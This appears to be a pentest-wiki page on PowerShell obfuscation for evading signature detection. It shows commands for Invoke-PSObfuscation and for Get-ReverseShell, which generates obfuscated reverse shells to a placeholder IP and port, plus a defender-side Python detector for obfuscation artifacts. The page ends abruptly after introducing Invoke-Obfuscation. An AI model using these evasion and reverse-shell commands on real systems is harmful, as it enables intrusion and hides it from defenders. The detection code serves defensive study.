
PowerShell Obfuscation

Theory

The following techniques aim to evade signature-based detection by obfuscating PowerShell scripts and commands.

Practice

Invoke-PsObfuscation

Invoke-PsObfuscation is a powerful PowerShell obfuscation tool.


We can import the tool as follows.

Import-Module ./Invoke-PSObfuscation.ps1

To obfuscate a PowerShell file, use the following cmdlet.

# Using all switches
Invoke-PSObfuscation -Path in.ps1 -PipelineVariables -Pipes -Cmdlets -Methods -Integers -Aliases -Comments -NamespaceClasses -Variables -Strings -OutFile out.ps1
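As an added defender-side example (not code from the Invoke-PSObfuscation project or this page), a Python heuristic that scores PowerShell text, for instance a script block log event, for the artifacts the switches above tend to leave behind (backtick-split names, short string concatenation, the -f format operator, [char] casts, -join, Invoke-Expression) and strips backticks first so a name-based signature still fires on a split cmdlet name. The indicator weights, the threshold and both sample scripts are assumptions constructed for the example.

```python
"""Heuristic scorer for obfuscated PowerShell text (e.g. script block log events)."""
import re

# Indicator name -> (regex, weight). Weights and the cut-off are assumptions.
INDICATORS = {
    "backtick_split_token": (re.compile(r"[A-Za-z]`[A-Za-z]"), 2),
    "char_cast":            (re.compile(r"\[char\]\s*\d+", re.I), 1),
    "short_string_concat":  (re.compile(r"['\"][^'\"]{0,6}['\"]\s*\+\s*['\"]"), 1),
    "format_operator":      (re.compile(r"\"(?:\{\d+\})+\"\s*-f\b", re.I), 2),
    "invoke_expression":    (re.compile(r"\biex\b|Invoke-Expression", re.I), 3),
    "join_or_reverse":      (re.compile(r"-join\b|\[array\]::Reverse", re.I), 1),
    "encoded_input":        (re.compile(r"FromBase64String|-e(?:c|nc|ncodedcommand)?\b", re.I), 3),
}
SUSPICIOUS_THRESHOLD = 6  # assumed cut-off; tune against a baseline of your own scripts


def normalize(script: str) -> str:
    """A backtick before a letter inside a bare token (I`nvoke-Expr`ession) is dropped
    by the parser, so drop it before matching names. Real escapes such as `n are
    stripped too, which is acceptable for indicator matching."""
    return re.sub(r"`(?=[A-Za-z])", "", script)


def obfuscation_indicators(script: str) -> dict:
    """Return {indicator: hit count}. Backticks are counted on the raw text; every
    other indicator runs on the normalized text so split names still match."""
    norm = normalize(script)
    counts = {}
    for name, (rx, _weight) in INDICATORS.items():
        target = script if name == "backtick_split_token" else norm
        counts[name] = len(rx.findall(target))
    return counts


def obfuscation_score(script: str) -> int:
    """Weighted sum, capping each indicator at 5 hits so one long concatenation
    chain cannot dominate the score on its own."""
    counts = obfuscation_indicators(script)
    return sum(min(c, 5) * INDICATORS[n][1] for n, c in counts.items())


def is_suspicious(script: str) -> bool:
    return obfuscation_score(script) >= SUSPICIOUS_THRESHOLD


# Constructed samples (not tool output): a benign command, and a backtick /
# format-operator / [char]-cast obfuscated form that only writes "hi".
SAMPLE_CLEAN = r"Get-ChildItem -Path C:\Temp | Where-Object { $_.Length -gt 1MB }"
SAMPLE_OBFUSCATED = (
    "$s = ('Wri'+'te-')+(\"{1}{0}\" -f 'put','Out'); "
    "I`NV`oke-Ex`PRESSION ($s + ' ' + (-join ([char]104,[char]105)))"
)
```

The interesting line is the normalization: the raw text never contains the string Invoke-Expression, but the normalized text does, so a signature that matches the cmdlet name fires even though the backticks were meant to break it.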

Get-ReverseShell

Get-ReverseShell is a tool with the sole purpose of producing obfuscated reverse shells for PowerShell.


We can import the tool as follows.

Import-Module ./get-reverseshell.ps1

To generate a reverse shell, use the following commands.

# To stdout
Get-ReverseShell -Ip $IP -Port $PORT

# To file
Get-ReverseShell -Ip $IP -Port $PORT -OutFile /path/to/rev.ps1

Invoke-Obfuscation

Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator. Even though it is quite old, it is still relevant for bypassing static detections.


We can import and start the tool as follows.

Here are some usage examples:
